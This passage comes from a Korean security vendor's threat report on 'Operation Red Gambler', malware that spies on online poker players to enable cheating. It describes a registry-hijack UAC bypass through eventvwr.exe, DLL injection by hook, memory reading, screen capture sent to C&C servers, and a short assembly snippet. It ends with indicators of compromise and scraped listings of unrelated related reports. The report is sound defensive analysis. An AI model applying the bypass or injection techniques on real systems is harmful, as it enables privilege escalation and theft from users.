30 그림 2-9 사용자계정컨트롤 (UAC) 기능 사용자계정컨트롤은윈도우비스타운영체제부터도입된보안기능으로, [ 그림 2-9] 와같이윈도우운영체제에서시스템에영향을줄수있는보안문제를예방하기위해작업권한에따라실행을제한한다. 작업권한에는관리자권한과표준사용자권한이있으며레지스트리수정, 시스템경로에파일생성및삭제등시스템에영향을미치는작업이실행되면사용자계정컨트롤팝업창을생성하여관리자권한을요구한다. 이러한일련의권한상승과정을우회하기위해마이크로소프트관리콘솔 ( 이하 MMC) 을이용한 레지스트리하이재킹 (Hijacking) 기법을이용한다. MMC 는시스템구성요소로사용되는도구이 며, 마이크로소프트관리콘솔파일 ( 이하 MSC) 을관리한다. 순번 레지스트리경로 데이터 1 HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command 없음 2 HKEY_CLASSES_ROOT\mscfile\shell\open\command mmc.exe 표 2-6 MMC 호출시레지스트리경로 시스템구성요소중하나인이벤트뷰어 (eventvwr.exe) 가실행되면 [ 표 2-6] 과같이순번에따 라 2 개의레지스트리경로에데이터를읽고실행한다. 이실행과정은관리자권한 (High Integrity ASEC REPORT Vol.91 Security Trend 30

31 Level) 으로동작하므로데이터영역에특정파일의경로를추가할경우관리자권한으로파일을실 행할수있다. 그림 2-10 레지스트리생성 (RegCreateKeyExA) 정보 악성코드는 [ 그림 2-10] 과같이레지스트리에파일경로를추가한뒤이벤트뷰어를실행한다. 이 때이벤트뷰어에의해관리자권한으로실행된악성코드는 UAC 기능을우회하여악성행위를수 행한다. 그림 2-11 악성코드실행이후단계별정보 ASEC REPORT Vol.91 Security Trend 31

32 또한드로퍼 (Dropper) 기능을수행하며 [ 그림 1-11] 과같이파일내암호화된두개의파일을복호 화하여특정경로에추가파일을생성한다. 생성된추가파일은 taskeng.exe 와 wrmk.dll 이며, 작 업스케줄러에등록되어일정간격으로자동실행된다. [ 그림 2-12] 의암호화된두개의파일 (taskeng.exe, wrmk.dll) 의복원을위해사용된복호화코드는공격그룹의과거행적에서발견된복호화코드와일치한다. 자세한내용은 03. 연관성분석에서확인할수있다. [ 그림 2-13] 은 taskeng.exe 내부를나타낸 것이다. taskeng.exe 를통해구동된 wrmk. 그림 2-12 암호화된추가파일을복호화하는코드 dll 은악성행위를수행하기위해내부함수 StartChk() 를호출하며, wrmk.dll 은후킹함수 SetWindowsHookExA() 를이용하여실행중인프로세스에자신을인젝션 (Injection) 한다. 이동 작은 24 시간동안수행되며, 5 초간대기한후다시작업이수행된다. 그림 2-13 taskeng.exe 내부의모습 ASEC REPORT Vol.91 Security Trend 32

33 그림 2-14 프로세스에삽입된 wrmk.dll 내부의모습 - 1 인젝션된 wrmk.dll 은 [ 그림 2-14] 와같이인젝션대상프로세스의정보를확인한다. 확인하는프 로세스의정보는파일경로및파일이름이며, 프로세스가공격대상게임인지여부를판단한다. 게임종류게임이름파일경로파일이름 XXXXX 게임포커 *****game\poker Poker.exe 포커 XXXXX 게임포커 *****Game\Poker Poker.exe XXXX 7 포커 Poker.dll 표 2-7 공격대상게임종류 ( 단, 게임이포커일경우 ) 고스톱 포커류의사행성게임은게임종류는동일하나운영하는업체가다른경우가다수존재한다. 예를들면같은포커류게임이지만, 운영하는업체에따라 ** 탄포커게임, ** 드포커게임, * 망 7포커등으로분류된다. 이처럼파일이름이중복되는경우에는 [ 표 2-7] 의파일경로정보를이용하여공격대상에포함되는지추가로확인하는것으로추정된다. 만약프로세스가공격대상게임으로확인되면 [ 그림 2-15] 와같이게임별로각각새로운쓰레 드 (Thread) 를호출하여사용자의게임정보유 그림 2-15 프로세스에삽입된 wrmk.dll 내부의모습 - 2 출을시도한다. ASEC REPORT Vol.91 Security Trend 33

34 [ 그림 2-16] 과같이게임정보유출을위해악성코드에는메모리해킹 (Memory Hacking) 공격기법이적용되어있다. 고스톱 포커류의사행성게임의사용자정보는메모리영역에저장되므 로이를탈취하기위해사용되는공격방법이다. 그림 2-16 프로세스에삽입된 wrmk.dll 내부의모습 - 3 게임별로메모리영역에차이가있으므로해킹과정에사용되는코드정보또한다른데, 메모리해킹에사용되는코드의공통적인특징은해킹할메모리영역을찾아내 [ 그림2-17] 과같이게임채널, 게임방제목등의정보를 C&C 서버로전송하는것이다. 또한 [ 그림 2-18] 과같이실행중인게임화면 을캡쳐하는데, 캡쳐된화면정보는앞서수집 된사용자의게임정보와마찬가지로암호화하 그림 2-17 프로세스에삽입된 wrmk.dll 내부의모습 - 4 여 C&C 서버로전송한다. 그림 2-18 프로세스에삽입된 wrmk.dll 내부의모습 - 5 ASEC REPORT Vol.91 Security Trend 34

35 C&C 서버로전송된게임이름, 게임채널, 게임방제목, 게임화면정보는 [ 그림 2-19] 와같이범행사무실에서관리프로그램을통해감시가가능하다. 이를이용하여사기도박자가악성 코드에감염된시스템에서실행중인게임방에 그림 2-19 관리프로그램 ( 예시 ) 과게임이용자의화면정보 접속하여상대방의패를보는방식으로사기도박을진행하였을것으로판단된다. 한편 2017 년 2 분기부터유포된변종악성코드는이전에사용된악성코드와상당한차이를보였는 데, 이변종의가장큰특징은쉘코드 (ShellCode) 와 DLL 을시스템에생성하지않고메모리공간 에생성하는것이다. 그림 2-20 악성코드동작구조 - 1 변종악성코드는 [ 그림 2-20] 과같이실행중인사행성게임프로세스에함수 VirtualAlloc() 를호출하여가상메모리공간을확보한다. [ 그림 2-21] 에서는확보된메모리공간에함수 WriteProcessMemory() 를이용하여시스템내에서특정명령을실행하도록하는쉘코드 (ShellCode) 와 DLL을생성하는것을확인할 그림 2-21 악성코드동작구조 - 2 수있다. ASEC REPORT Vol.91 Security Trend 35

36 또한 [ 그림 2-22] 와같이함수 CreateProcessA() 를메모리패치하여사행성게임프로세스가해당함수를호출할때사행성게임프로세스의메모리공간에생성해둔쉘코드를실행한다. 실행된쉘코드는 [ 그림 2-23] 과같이 DLL 을다 그림 2-22 악성코드동작구조 - 3 시실행하는데, 이후부터는이전과동일하게프로세스가공격대상게임인경우사용자의게임정보 유출을시도한다. 그림 2-23 악성코드동작구조 - 4 A 공격그룹은지속적으로이와같은변종악성코드를유포하였으며, 이는주기적으로상표가변경 되는고스톱 포커류의사행성게임시장의특수한환경요인때문인것으로추정된다. 그림 2-24 변경된함수명과공격대상정보 ASEC REPORT Vol.91 Security Trend 36

37 항목변경전변경후 함수명 공격대상 idhook ID EndChk StartChk *** 망 (***ang) *** 탄게임 (*****tan Game) **** 드게임 (*****nd Game) Public StartChk mov eax, hmod push 0x0 push eax ; hmod push offset fn push 0x3 ; WH_GETMESSAGE call ds:setwindowshookexa() EndTest StartTest *** 망 (***ang) ***** 게임 (*****game) ***** 팩트게임 (*****pact Game) ***** 게임 (*****rry Game) Public StartTest mov eax, hmod push 0x0 push eax ; hmod push offset fn push 0x5 ; WH_CBT call ds:setwindowshookexa() 표 2-8 변경된함수명, 공격대상, 후킹정보 2017 년 1 분기에유포된변종악성코드는 [ 그림 2-24] 과같이기존악성코드에서사용된 EX- PORT 함수명과공격대상게임이변경되었으며, DLL 인젝션과정에서사용하는 idhook ID 가 0x3h(WH_GETMESSAGE) 에서 0x5h(WH_CBT) 로변경되었다. [ 표 2-8] 은변경된함수명, 공격대상, 후킹정보에대한상세내용이다. 변경된함수명에포함된문자열 Test 을근거로공격자는제작한악성코드가정상작동하는지를시험한것으로추정된다. 또한 ** 탄게임과 ** 드게임의상표변경으로인하여, 공격대상이 * 팩트게임, * 리게임으로수정되었다. [ 그림 2-25] 은게임별메모리해킹코드정보 이다. 게임이름은다르나메모리해킹과정에 서사용되는코드가동일한것을확인할수있 그림 2-25 게임별메모리해킹코드정보 다. 이를근거로게임의상표가변경되더라도 ASEC REPORT Vol.91 Security Trend 37

38 게임클라이언트에큰변화가없는것으로판단되며, 고스톱 포커류의게임시장에서는운영자가 상표만변경하여동일한게임을운영하는것으로추정할수있다. 03. 연관성분석 2016년 10월부터 2017년 8월까지약 11개월동안진행된공격에서수집된자료및과거국내주요사이버공격에대한분석을바탕으로프로파일링한결과, 안랩시큐리티대응센터 (ASEC) 는이번오퍼레이션레드갬블러 (Operation Red Gambler) 공격역시 A 공격그룹과관련되어있음을확인했다. 그림 2-26 게임별메모리해킹코드정보 [ 그림 2-26] 는 A 공격그룹과관련된국내주요사이버공격에서사용된악성코드를나열한그림이다. 2016년 2월 I사인증서유출, 2016년 4월방산업체해킹, 2016년 8월국가기관해킹, 2017년 3월 ATM 해킹등에사용한악성코드와오퍼레이션레드갬블러공격에사용된악성코드가동일한암 / 복호화코드패턴을사용하고있음을알수있다. 04. 안랩제품의대응현황 MDS 와 V3 제품군등안랩의주요제품은오퍼레이션레드갬블러 (Operation Red Gambler) 와관 련된악성코드를각각다음과같은진단명으로탐지및대응하고있다. ASEC REPORT Vol.91 Security Trend 38

39 AhnLab MDS V3 제품군 Malware/MDP.Download 등 Trojan/Win32.GameHack 등 05. 결론안랩시큐리티대응센터 (ASEC) 가특정국가와관련된것으로추정되는해킹그룹의최근공격동향을분석한결과, 표면적으로는정보유출이주목적인것처럼보이지만실제로는오퍼레이션레드갬블러와같이탈취한정보를이용하여경제적이득을취하려는시도또한다수존재했다. 특히지난 2016 년부터국내를타깃으로지속적인공격을전개해온 A 공격그룹은과거국내주요기 관및기업에대한공격에집중했던것과는별개로최근다수의일반사용자들에게도사이버공격을 수행하며공격대상을다각화하고있다. A 공격그룹은경제적이익을위해앞으로도다양한악성코드를사용하여다수의공격을시도할것으 로예상되며, 이러한공격에대비하기위해국가기관과보안업체간의긴밀한공조와협력이필요할 뿐만아니라개인사용자들도더욱각별한주의가필요하다. 06. 관련침해지표 (IOC, Incident of Compromise) MD5 C&C 768bd6497d7e903d28120b1152feced1 9a50be3def f35d3c0911e2e70 de372dba210fad421d92e a22d C8C C724C2A4F5ED0898DF 323a410779f2aef79a5e1e0ee600789d ffe a8fee59bcc058ecac0ed d0ad00f4ba8ee86d7fce7454d963 A59DAB67BF24D3D5E139B5F5611A6CFE 7f007fd794c93267f57cabe464dbdc5a 40f4305b7c9bf1236b9accbc0dc8fb88 0bba3d00a4212d24b4c77bb06efcee47 mobile.read-books.org blogs.pgafan.net daum.servehttp.com pmang.servegame.com naver.serveblog.net neowiz.servegame.com ASEC REPORT Vol.91 Security Trend 39

40

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응 MALWARE ANALYSIS REPORT WannaCry 랜섬웨어분석 #2 SMB 취약점분석 목차 1. 개요... 3 1.1 배경... 3 1.2 파일정보... 3 2. 상세분석... 4 2.1 SMB 취약점공격흐름... 4 2.2 특징적인행위... 11 3. 대응... 12-2 - 1. 개요 1.1 배경 2017년 5월 17일배포한 WannaCry 분석보고서에도언급되었듯이,

More information

ActFax 4.31 Local Privilege Escalation Exploit

ActFax 4.31 Local Privilege Escalation Exploit NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고

More information

*2008년1월호진짜

*2008년1월호진짜 3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가

More information

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코 월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.

More information

ASEC REPORT VOL 년 1 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안

ASEC REPORT VOL 년 1 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안 ASEC REPORT VOL.90 2018 년 1 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성하며, 주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다.

More information

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B 월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10

More information

#WI DNS DDoS 공격악성코드분석

#WI DNS DDoS 공격악성코드분석 #WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음

More information

목차 01. 개요 감염경로 워너크립터동작방식 ) 동작과정상세분석 ) 감염증상 ) 파일암호화및복호화방식 안랩대응현황 AhnLab, Inc. All rights reserved.

목차 01. 개요 감염경로 워너크립터동작방식 ) 동작과정상세분석 ) 감염증상 ) 파일암호화및복호화방식 안랩대응현황 AhnLab, Inc. All rights reserved. Trojan/Win32.WannaCryptor 상세분석 안랩시큐리티대응센터 (ASEC) 분석팀 경기도성남시분당구판교역로 220 ( 우 ) 13493 대표전화 : 031-722-8000 팩스 : 031-722-8901 www.ahnlab.com AhnLab, Inc. All rights reserved. 목차 01. 개요... 3 02. 감염경로... 4 03.

More information

ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하

ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하 Security Trend ASEC REPORT VOL.79 July, 2016 ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정

More information

Security Trend ASEC Report VOL.56 August, 2014

Security Trend ASEC Report VOL.56 August, 2014 Security Trend ASEC Report VOL.56 August, 2014 ASEC Report VOL.56 August, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,

More information

ASEC REPORT VOL.83 November, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에

ASEC REPORT VOL.83 November, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에 Security Trend ASEC REPORT VOL.83 November, 2016 ASEC REPORT VOL.83 November, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,

More information

ASEC REPORT VOL.85 January, 2017 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성

ASEC REPORT VOL.85 January, 2017 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성 Security Trend ASEC REPORT VOL.85 January, 2017 ASEC REPORT VOL.85 January, 2017 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성하며,

More information

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770> 웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.

More information

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 월간악성코드은닉사이트탐지 동향보고서 5 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황

More information

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture1 Malware Analysis #1 Agenda 악성코드정적분석 악성코드분석 악성코드정적분석 정적분석 임의의코드또는응용프로그램을실행하지않고분석 ASCII 문자열 (ex. URL) API 리스트 Packing VT 기타등등 정적분석 : 파일식별 악성으로의심되는파일의형태식별 file

More information

ASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC

ASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC Security Trend ASEC REPORT VOL.81 September, 2016 ASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,

More information

월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부

월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부 월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황

More information

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE-2013-3897) 을통해유포되는악성코드가 DDoS, 원격제어, 게임계정유출기능을하고국내감염 PC 가 2만 8천여대에이르러 KISA 는신속대응한바있다.

More information

Windows 8에서 BioStar 1 설치하기

Windows 8에서 BioStar 1 설치하기 / 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar

More information

로거 자료실

로거 자료실 redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...

More information

ASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성

ASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성 Security Trend ASEC REPORT VOL.76 April, 2016 ASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정

More information

ASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서

ASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서 Security Trend ASEC REPORT VOL.82 October, 2016 ASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,

More information

1. 개요 전세계적으로많은피해를일으키고있는랜섬웨어는 년 월국내에 광범위하게유포되기시작하여 년에급격하게증가하였다 랜섬웨어 는이용자의데이터 시스템파일 문서 이미지등 를암호화하는악성코드로 몸값 과소프트웨어 의합성어로시스템을잠그거나 데이터를암호화해사용할수없도록하고이를인질로금전

1. 개요 전세계적으로많은피해를일으키고있는랜섬웨어는 년 월국내에 광범위하게유포되기시작하여 년에급격하게증가하였다 랜섬웨어 는이용자의데이터 시스템파일 문서 이미지등 를암호화하는악성코드로 몸값 과소프트웨어 의합성어로시스템을잠그거나 데이터를암호화해사용할수없도록하고이를인질로금전 `16 년랜섬웨어동향및 `17 년전망 2017. 01 본보고서의전부나일부를인용시, 반드시 [ 자료 : 한국인터넷진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 전세계적으로많은피해를일으키고있는랜섬웨어는 년 월국내에 광범위하게유포되기시작하여 년에급격하게증가하였다 랜섬웨어 는이용자의데이터 시스템파일 문서 이미지등 를암호화하는악성코드로 몸값 과소프트웨어 의합성어로시스템을잠그거나

More information

ASEC REPORT VOL 년 4 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안

ASEC REPORT VOL 년 4 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안 ASEC REPORT VOL.93 2018 년 4 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성하며, 주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다.

More information

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아 LG U+ SMS/MMS 통합클라이언트 LG U+ SMS/MMS Client Simple Install Manual LG U+ SMS/MMS 통합클라이언트 - 1 - 간단설치매뉴얼 1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml

More information

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

Microsoft Word - windows server 2003 수동설치_non pro support_.doc Windows Server 2003 수동 설치 가이드 INDEX 운영체제 설치 준비과정 1 드라이버를 위한 플로피 디스크 작성 2 드라이버를 위한 USB 메모리 작성 7 운영체제 설치 과정 14 Boot Sequence 변경 14 컨트롤러 드라이버 수동 설치 15 운영체제 설치 17 운영체제 설치 준비 과정 Windows Server 2003 에는 기본적으로

More information

Endpoint Protector - Active Directory Deployment Guide

Endpoint Protector - Active Directory Deployment Guide Version 1.0.0.1 Active Directory 배포가이드 I Endpoint Protector Active Directory Deployment Guide 목차 1. 소개...1 2. WMI 필터생성... 2 3. EPP 배포 GPO 생성... 9 4. 각각의 GPO 에해당하는 WMI 연결... 12 5.OU 에 GPO 연결... 14 6. 중요공지사항

More information

ASEC REPORT VOL 년 1 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안

ASEC REPORT VOL 년 1 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안 ASEC REPORT VOL.94 2019 년 1 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성하며, 주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다.

More information

08_spam.hwp

